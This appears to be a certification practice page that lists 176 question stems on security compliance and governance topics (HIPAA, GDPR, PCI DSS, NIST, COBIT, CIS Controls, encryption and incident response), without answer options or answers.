ExpertCovered in these exams
All questions (176)
Which of the following is a 'preventive' control in the context of network security?
A covered entity under HIPAA uses a cloud service to store Patient Health Information (PHI). The cloud provider experiences a data breach where unencrypted PHI is exposed. Under the HIPAA Breach Notification Rule, which of the following actions is REQUIRED?
Under the General Data Protection Regulation (GDPR), a 'Data Controller' is defined as:
A retailer processes credit card transactions. According to PCI DSS Requirement 3 (Protect stored cardholder data), which of the following data elements is permitted to be stored after authorization, provided it is encrypted?
The NIST Cybersecurity Framework (CSF) organizes its Core into five concurrent and continuous functions. Which function includes activities to 'develop and implement the appropriate safeguards to ensure delivery of critical infrastructure services'?
An organization is adopting the COBIT 2019 framework. Which of the following is NOT one of the six 'Governance System Principles' of COBIT 2019?
A penetration tester is hired to assess a company's external security. The tester sends a deceptive email to the HR department claiming to be an applicant, with a malicious attachment designed to harvest credentials. This type of attack is best classified as:
Which of the following authentication methods provides the highest level of security for remote access to a corporate network?
An auditor is reviewing the 'Least Privilege' implementation for a database. They find that the 'Reporting_User' role has 'DROP TABLE' permissions. Why is this a control deficiency?
Which of the following best describes the concept of 'Defense in Depth'?
A service organization is undergoing a SOC 2® engagement. The auditor observes that the organization uses a 'bastion host' or 'jump box' to access the production network. What is the primary security purpose of this component?
In the context of encryption, what is the primary difference between symmetric and asymmetric encryption?
A company wants to ensure that sensitive emails sent to external clients cannot be read by interceptors. They implement a solution where the sender uses the recipient's public key to encrypt the message. This ensures:
An auditor is reviewing the incident response plan of a financial institution. The plan states that in the event of a ransomware attack, the first step is to 'Pay the ransom immediately to restore operations.' How should the auditor evaluate this procedure?
Which of the following is a key requirement of the NIST Privacy Framework's 'Control' function?
Which of the following is a 'corrective' control?
An auditor is reviewing the logical access controls for a financial application. They notice that the 'Application Administrator' account is shared by three members of the IT support team. The password is stored in a password vault. What is the primary risk?
Under the CIS Controls (Center for Internet Security), Control 1 is 'Inventory and Control of Enterprise Assets'. Why is this considered the foundational control?
A company implements a 'Zero Trust' architecture. Which of the following principles is central to this model?
A company is subject to GDPR. They wish to use customer data for a new purpose (marketing) that was not disclosed when the data was originally collected. What must they typically do?
A company uses 'Tokenization' to protect credit card numbers. How does this differ from Encryption?
Which of the following is a 'physical' security control?
Which of the following is a requirement of the HIPAA Security Rule but NOT the Privacy Rule?
Which of the following best describes 'Static Application Security Testing' (SAST)?
An auditor observes that a company uses 'Symmetric' encryption for transmitting large database backups across a public network. The key exchange is handled via a separate secure channel. Is this appropriate?
In the context of COBIT 2019, what is the purpose of the 'Goals Cascade'?
A company uses a 'Biometric' authentication system. The 'False Acceptance Rate' (FAR) is set to 0.01%. What does this mean?
Which of the following is a 'Logical' access control?
Under the NIST Cybersecurity Framework, 'Recovery Planning' falls under which function?
A company stores customer passwords in a database. To protect them, they use a hashing algorithm. Which additional technique should be applied to prevent 'Rainbow Table' attacks?
Which of the following is a 'Social Engineering' technique where the attacker waits for an authorized user to pass through a secure door and then follows them inside?
A company uses a 'Public Key Infrastructure' (PKI). What is the role of the 'Certificate Authority' (CA)?
An auditor is reviewing the 'Incident Response' log. They see an entry: 'Server detected high CPU usage. Investigation showed it was a scheduled backup. Ticket closed.' Was this an 'Incident'?
Which of the following is a requirement of PCI DSS Requirement 11 (Regularly test security systems and processes)?
Which of the following is the MOST effective method to prevent 'SQL Injection' attacks in a web application?
Which of the following entities is considered a 'Covered Entity' under the HIPAA Privacy Rule?
Under GDPR, which principle requires that personal data be adequate, relevant, and limited to what is necessary in relation to the purposes for which they are processed?
An organization uses a 'defense-in-depth' strategy. Which of the following best represents this approach?
Which NIST Cybersecurity Framework (CSF) function includes the category 'Recovery Planning'?
A company processes credit card transactions. Which standard is MOST applicable to their environment?
Which type of attack involves an attacker inserting malicious code into a website's input field to manipulate the backend database?
Which of the following is a detective control?
In the context of CIS Controls, what is the primary purpose of 'Inventory and Control of Enterprise Assets' (Control 1)?
Which encryption method uses a pair of keys: a public key for encryption and a private key for decryption?
Which NIST Special Publication provides a catalog of security and privacy controls for federal information systems?
Which of the following best describes 'Tokenization'?
A healthcare provider stores patient records in a cloud database. Which HIPAA rule specifically governs the technical safeguards (like encryption and access control) for this electronic Protected Health Information (ePHI)?
A company uses a biometric scanner for server room access. This is an example of which authentication factor?
In the context of COBIT 2019, which of the following is a 'Governance Objective' rather than a 'Management Objective'?
Which of the following is a 'Corrective' control?
A company is subject to GDPR. A data breach occurs involving unencrypted personal data of 5,000 customers. Within what timeframe must the company generally notify the supervisory authority?
An auditor is reviewing the 'User Access Review' control. The policy states reviews happen quarterly. The auditor finds that for Q2, the review was signed off by the same person who has administrative rights to grant access. What is the risk?
Which phase of the Cyber Kill Chain involves transmitting the weaponized code to the target environment (e.g., via email attachment)?
Which of the following is a primary benefit of using a 'VPN' (Virtual Private Network) for remote employees?
Which NIST Privacy Framework function includes the category 'Data Processing Management'?
Which of the following is a 'Preventive' control?
Under the HIPAA Security Rule, 'Encryption' is classified as an 'Addressable' implementation specification. What does 'Addressable' mean?
Which of the following is a 'Social Engineering' attack?
Which of the following is a 'Physical' security control?
A company stores customer passwords in a database. To enhance security, they add a random string of characters to each password before hashing it. This technique is known as:
What is the primary purpose of a 'DDoS' (Distributed Denial of Service) attack?
An auditor is reviewing the 'Incident Response Plan'. Which phase should occur immediately after 'Containment'?
Which of the following is a 'Logical' access control?
Which GDPR right allows an individual to request that their personal data be sent to them or another controller in a structured, commonly used, and machine-readable format?
Which of the following is a key principle of 'Zero Trust' architecture?
Which COBIT 2019 component describes the rules, regulations, and policies that the enterprise must comply with?
An auditor is testing 'Logical Access'. They find a user with the role 'SuperAdmin'. This user is also the 'HR Manager'. What is the primary concern?
A company uses 'Ransomware' insurance. This is an example of which risk response strategy?
Which of the following is a 'Data Loss Prevention' (DLP) control?
Which of the following is a 'Symmetric' encryption algorithm?
An auditor is reviewing the 'Termination' process. They find that while network access is revoked immediately, physical access cards are often collected weeks later. What is the risk?
An auditor finds that a company's 'Incident Response Plan' has not been tested or updated in 3 years. What is the primary recommendation?
A healthcare provider stores patient records in a data warehouse. To comply with HIPAA while allowing data analysts to study demographic trends, the organization replaces patient names with unique alphanumeric codes that can be mapped back to the original data only by the database administrator. This technique is known as:
Under the General Data Protection Regulation (GDPR), a data subject requests that a company transmit their personal data directly to another service provider. This request falls under which specific right?
Which of the following NIST Cybersecurity Framework (CSF) functions is PRIMARILY associated with the implementation of safeguards to ensure delivery of critical infrastructure services, such as Access Control and Awareness Training?
A retailer processes credit card transactions. They have segmented their network so that the Cardholder Data Environment (CDE) is isolated from the corporate Wi-Fi network. According to PCI DSS, what is the primary benefit of this segmentation?
An organization uses a 'Defense in Depth' strategy. Which of the following represents a correct layering of controls from the perimeter inward?
In the context of COBIT 2019, which of the following best describes the distinction between Governance and Management?
A company implements a 'Zero Trust' architecture. Which of the following principles is central to this approach?
Which of the following is a primary responsibility of the 'Data Controller' under GDPR?
A company is subject to HIPAA. An employee loses a company laptop containing unencrypted ePHI (electronic Protected Health Information). Under the HIPAA Breach Notification Rule, what is the immediate requirement if the breach affects more than 500 individuals?
Which of the following is a characteristic of a 'Symmetric' encryption algorithm?
Which of the following is an example of a 'Preventive' control?
An auditor is reviewing a client's compliance with the NIST Privacy Framework. The client has a process to 'notify individuals about how their data is collected and used'. This aligns with which Function of the NIST Privacy Framework?
A company uses a 'Phishing Simulation' to test employees. This is primarily a test of which security domain?
Which of the following describes a 'Logic Bomb'?
Which of the following is a key requirement of the HIPAA Security Rule but NOT the Privacy Rule?
An auditor is reviewing a firewall configuration. They see a rule at the bottom of the Access Control List (ACL) that says 'DENY ALL'. What is this practice called?
An auditor is testing the 'Logical Access' controls for an ERP system. They select a sample of new employees and verify that their access rights were approved by a manager. This test is designed to validate which assertion?
An organization discovers a vulnerability in their web server software. The vendor has released a patch, but the organization cannot apply it immediately due to compatibility issues with a legacy application. What is the BEST temporary course of action?
Which of the following statements accurately describes the 'Integrity' component of the CIA Triad?
Which of the following is a 'Corrective' control?
An auditor is reviewing a database schema. They notice that the 'SocialSecurityNumber' column is stored in cleartext. Which control is missing?
A company uses a biometric fingerprint scanner and a PIN code for server room access. What type of authentication is this?
Which CIS Control is typically prioritized as Control #1 because you cannot protect what you do not know you have?
An auditor is reviewing the 'Incident Response Plan'. The plan includes a step for 'Containment'. What is the primary goal of this phase?
Which of the following attacks involves an attacker intercepting communication between two parties and relaying messages between them?
A company uses 'Asymmetric' encryption for secure email. If Alice wants to send a confidential email to Bob that only Bob can read, which key does she use to encrypt it?
Which of the following is a 'Detective' control?
Under COBIT 2019, which component of the governance system describes the 'rules of the game'?
A company wants to implement a 'Least Privilege' model for its cloud storage buckets. What does this entail?
A company is designing a new data center. They install a 'Biometric Mantrap' at the entrance. What is the purpose of this control?
A company is implementing a 'Data Loss Prevention' (DLP) solution. Which of the following is a primary function of DLP?
Which of the following is a characteristic of 'Ransomware'?
A company uses a 'VPN' (Virtual Private Network) for remote employees. What is the primary security function of the VPN?
An auditor is testing the 'Termination' process. They find that a terminated employee's Active Directory account was disabled 5 days after their departure. The policy states 'Immediate' (within 24 hours). What is the risk?
Which of the following is a requirement of the 'NIST SP 800-53' framework?
A company uses 'Input Validation' on its web forms. Which attack does this primarily prevent?
What is the difference between 'Authentication' and 'Authorization'?
Which of the following is a 'Social Engineering' technique?
A company uses 'Role-Based Access Control' (RBAC). How are permissions assigned?
A company uses 'Hashing' to store passwords. Why is this better than encryption?
A healthcare provider stores patient records in a cloud database. To comply with HIPAA, they must ensure that even if the database storage media is stolen, the data remains unreadable. Which control is MOST appropriate to address this specific risk?
Under the General Data Protection Regulation (GDPR), a data subject requests that a company delete all their personal data. The company refuses because the data is required to be retained by tax laws. Which GDPR principle allows the company to refuse this request?
An auditor is evaluating a company's compliance with PCI DSS Requirement 3 (Protect stored cardholder data). The auditor finds that the Primary Account Number (PAN) is displayed in full on the customer service representative's screen. Which specific control is missing?
Which component of the NIST Cybersecurity Framework (CSF) focuses on developing and implementing the appropriate activities to maintain plans for resilience and to restore any capabilities or services that were impaired due to a cybersecurity event?
An attacker sends an email to the HR department with an attachment named 'Payroll_Update.exe' that looks like a PDF icon. When clicked, it installs software that logs keystrokes. Which stage of the cyber-attack lifecycle does the 'clicking of the attachment' represent?
A company implements a 'Zero Trust' architecture. Which of the following principles is central to this approach?
Which of the following is a key principle of the COBIT 2019 governance framework?
A company is subject to HIPAA. An employee loses a company laptop containing unencrypted ePHI (electronic Protected Health Information) of 600 patients. Under the HIPAA Breach Notification Rule, which of the following actions is REQUIRED?
Which of the following best describes the 'Integrity' component of the CIA Triad in information security?
Which of the following authentication methods is considered 'Something you are'?
Which CIS Control focuses on 'Inventory and Control of Enterprise Assets'?
In the context of NIST SP 800-53, what does the term 'Control Baseline' refer to?
An auditor is testing a client's firewall configuration. They notice a rule that allows 'Any' source IP to access the database port (1433) directly from the internet. Which security principle is violated?
Which of the following scenarios describes a 'Phishing' attack?
What is the primary purpose of a 'VPN' (Virtual Private Network) for remote employees?
A company wants to ensure that their cloud provider cannot access their sensitive data, even if the provider is subpoenaed. Which control achieves this?
An auditor is reviewing the 'Incident Response Plan'. Which phase of incident response involves removing the threat from the environment (e.g., deleting malware, disabling breached accounts)?
Which of the following is an example of a 'Detective' control?
A company processes credit card payments. Which standard MUST they comply with?
A company uses 'Asymmetric Encryption' for secure email. If User A wants to send a confidential message to User B, which key should User A use to encrypt the message?
An auditor observes that a company uses 'Hashing' to store passwords. Why is hashing preferred over encryption for password storage?
Which of the following is a 'Physical' threat to information systems?
A company implements 'Data Loss Prevention' (DLP) software. Which of the following actions would the DLP system most likely block?
Which of the following is a 'Nation-State' threat actor most likely to target?
Under GDPR, which role determines the 'purposes and means' of processing personal data?
A company uses 'Tokenization' for credit card numbers. What is the primary benefit of tokenization over encryption for the merchant?
Which NIST framework is specifically designed to help organizations manage privacy risks?
A company uses 'Symmetric Encryption'. Which of the following is a major challenge associated with this method?
An auditor is reviewing the 'Incident Response' logs. They see a 'False Positive'. What does this mean?
Which of the following is a 'Preventive' control for 'SQL Injection'?
Which of the following is an example of 'Social Engineering'?
An auditor is reviewing the 'Data Retention Policy'. The policy states that customer data is deleted after 7 years. However, the auditor finds backups containing 10-year-old data. This is a violation of which GDPR principle?
Under the HIPAA Security Rule, which of the following is a 'Covered Entity'?
A European customer requests that a US-based company delete all their personal data. Under GDPR, this is known as:
Which PCI DSS requirement falls under the goal of 'Protect Cardholder Data'?
The NIST Cybersecurity Framework (CSF) is organized into five core functions. Which function involves developing and implementing the appropriate activities to maintain plans for resilience and to restore any capabilities or services that were impaired due to a cybersecurity event?
Which component of COBIT 2019 describes the 'Governance System'?
According to the CIS Controls v8, what is Control 1 (the most foundational control)?
NIST Special Publication 800-53 is primarily designed for:
Which part of the NIST Privacy Framework helps organizations determine their current privacy posture and their target state?
An employee receives an email appearing to be from the CEO asking for an urgent wire transfer. The email address is slightly misspelled. This is an example of:
A web application allows users to input text into a comment field. A malicious user enters a script that executes in the browsers of other users viewing the comment. This is known as:
Which stage of the 'Cyber Kill Chain' involves the attacker installing a backdoor or remote access trojan (RAT) to maintain access?
What is the primary purpose of a Distributed Denial of Service (DDoS) attack?
Which of the following is a characteristic of an 'Advanced Persistent Threat' (APT)?
An organization implements a 'Zero Trust' architecture. Which principle is central to this approach?
Which authentication factor is represented by a fingerprint scan?
A network administrator separates the Finance department's network traffic from the Engineering department's traffic using VLANs. This is an example of:
Which security device is primarily designed to detect and block malicious traffic patterns or signatures in real-time?
In an Identity and Access Management (IAM) system, 'Role-Based Access Control' (RBAC) assigns permissions based on:
Which cryptographic concept ensures that a message has not been altered in transit?
An auditor is reviewing the results of a penetration test. The report identifies a 'Critical' vulnerability involving an unpatched server exposed to the internet. What is the auditor's most appropriate next step?
What is the primary difference between Vulnerability Scanning and Penetration Testing?
During a security walkthrough, an auditor notices that employees are writing passwords on sticky notes attached to their monitors. Which control is failing?
Which type of security test involves the tester having full knowledge of the system (network diagrams, source code, IP addresses) beforehand?
A company replaces sensitive credit card numbers in their database with a random string of characters that has no mathematical relationship to the original number. The mapping is stored in a secure vault. This technique is called:
Which encryption type uses a public key to encrypt and a private key to decrypt?
Data Loss Prevention (DLP) tools are primarily designed to:
What is the difference between Confidentiality and Privacy?
Which phase of the data lifecycle involves securely removing data when it is no longer needed?
In Incident Response, what is the primary goal of the 'Containment' phase?
A company purchases cyber insurance. Which risk management strategy is this?
What is the difference between an 'Event' and an 'Incident' in cybersecurity?
After a ransomware attack is resolved, the team holds a 'Lessons Learned' meeting. What is the primary output of this meeting?
Practice these questions with detailed guidance
Full answers, grading, and explanations on why each answer is correct.